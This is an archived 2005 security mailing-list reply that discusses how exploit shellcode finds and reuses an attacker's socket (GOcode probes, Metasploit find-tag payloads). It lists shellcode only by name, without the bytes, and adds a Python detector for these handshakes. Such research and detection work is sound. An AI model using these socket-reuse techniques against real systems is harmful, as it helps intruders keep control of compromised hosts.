Dailydave mailing list archives

Re: A white-tip shark has a sensitive enough lateral line to hunt the reef in complete darkness


From: H D Moore <hdm-daily-dave () digitaloffense net>
Date: Thu, 6 Jan 2005 23:21:39 -0600

On Thursday 06 January 2005 20:57, Dave Aitel wrote:
1. LSD-style getpeername loop. [...]  in fact, this is the method
everyone else but Immunity and .gov.cn and a few other random people use 
(Halvar, for example :>), as far as I know.

Somewhat of a broad statement, NAT has made these obsolete for a while...

2. If you were at G-Con 1 several years back you [...] . The one
relating to stealing sockets is his initial implementation of "GOcode".
Basically it goes to each socket, sends a G down it, and waits for a
sec. Then it reads one byte. If it gets an O (hence, the GOcode) then
it knows it has the right socket. CANVAS uses GOcode for SPARC Solaris,
Linux, and Windows. Bas Alberts spent a long time making it actually
work. It sounds easy, but especially on Win32 there are a lot of
"gotchas". This is usually pretty big code and maybe some people are
wondering why their connection happened to get a G sent to it - but it
has one major advantage: It doesn't care about NAT devices.  (Various
people use PEEK as a refinement on this technique).

Please see the code below. Win32 find tag shellcode, ~92 bytes and works 
on every version of Windows from NT 4.0 to 2003. Commented source and the 
associated paper should be available sometime soon.

3. If you search Google for "readclient shellcode" you can see that
several Chinese exploits have been successful at using the
readclient/writeclient ISAPI functions for back communications.

This is some really interesting stuff, unfortunately all of the comments 
are in Chinese (and afaik nobody has translated them). It is funny how 
much stuff comes out of xfocus that is years ahead of the rest of the 
world. Maybe some day you will open-source your ECB payloads? :-)


And now on to the warez (all written by metasploit staff, part of 2.3)...

# win32 find tag -> recv -> jump code (92 bytes) 

# linux ia32 find tag -> recv -> jump code (37 bytes)

# bsd ia32 find tag -> recv -> jump code (40 bytes)

# macos x ppc find tag -> recv -> jump code (76 bytes)


Cheers,

-HD
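A small detector for the two socket-recovery handshakes discussed in this thread (Dave's GOcode "G"/"O" probe and the find-tag payloads HD posted), added here as an example and not part of the original mail. It assumes the four-byte tag "msf!" (0x6d 0x73 0x66 0x21), which is the compare value in the posted payloads, and runs over constructed sample connections rather than captured traffic.

```python
from dataclasses import dataclass, field

FIND_TAG = b"msf!"  # 4-byte tag the posted find-tag payloads compare against
GO_PROBE = b"G"     # GOcode: compromised server writes "G" down each socket...
GO_REPLY = b"O"     # ...and keeps the one whose peer answers with "O"

@dataclass
class Connection:
    """One reassembled TCP connection: ordered (direction, payload) chunks,
    direction is 'c2s' (client to server) or 's2c' (server to client)."""
    conn_id: str
    chunks: list = field(default_factory=list)

def classify(conn):
    """Return the socket-recovery handshakes observed on one connection."""
    findings = []
    # find-tag: the attacker's client write begins with the tag; the
    # payload then jumps into the bytes that follow it.
    if any(side == "c2s" and data.startswith(FIND_TAG) for side, data in conn.chunks):
        findings.append("find-tag")
    # GOcode: a single-byte "G" from the server, answered later by a
    # single-byte "O" from the client on the same connection.
    seen_probe = False
    for side, data in conn.chunks:
        if side == "s2c" and data == GO_PROBE:
            seen_probe = True
        elif seen_probe and side == "c2s" and data == GO_REPLY:
            findings.append("gocode")
            break
    return findings

def scan(conns):
    """Map connection id to findings, omitting clean connections."""
    return {c.conn_id: f for c in conns if (f := classify(c))}

# Constructed sample traffic (not captured data); c3 is a benign response
# that merely contains "GO" inside a larger write and must not be flagged.
SAMPLE = [
    Connection("c1", [("c2s", b"GET /a.asp?x=" + b"A" * 16 + b"\r\n\r\n"),
                      ("c2s", b"msf!" + b"\x90" * 8)]),
    Connection("c2", [("c2s", b"GET / HTTP/1.0\r\n\r\n"),
                      ("s2c", b"G"), ("c2s", b"O"), ("c2s", b"\x90" * 8)]),
    Connection("c3", [("c2s", b"GET / HTTP/1.0\r\n\r\n"),
                      ("s2c", b"HTTP/1.0 200 OK\r\n\r\nGO")]),
]

if __name__ == "__main__":
    for cid, hits in scan(SAMPLE).items():
        print(cid, hits)
```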
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
https://lists.immunitysec.com/mailman/listinfo/dailydave
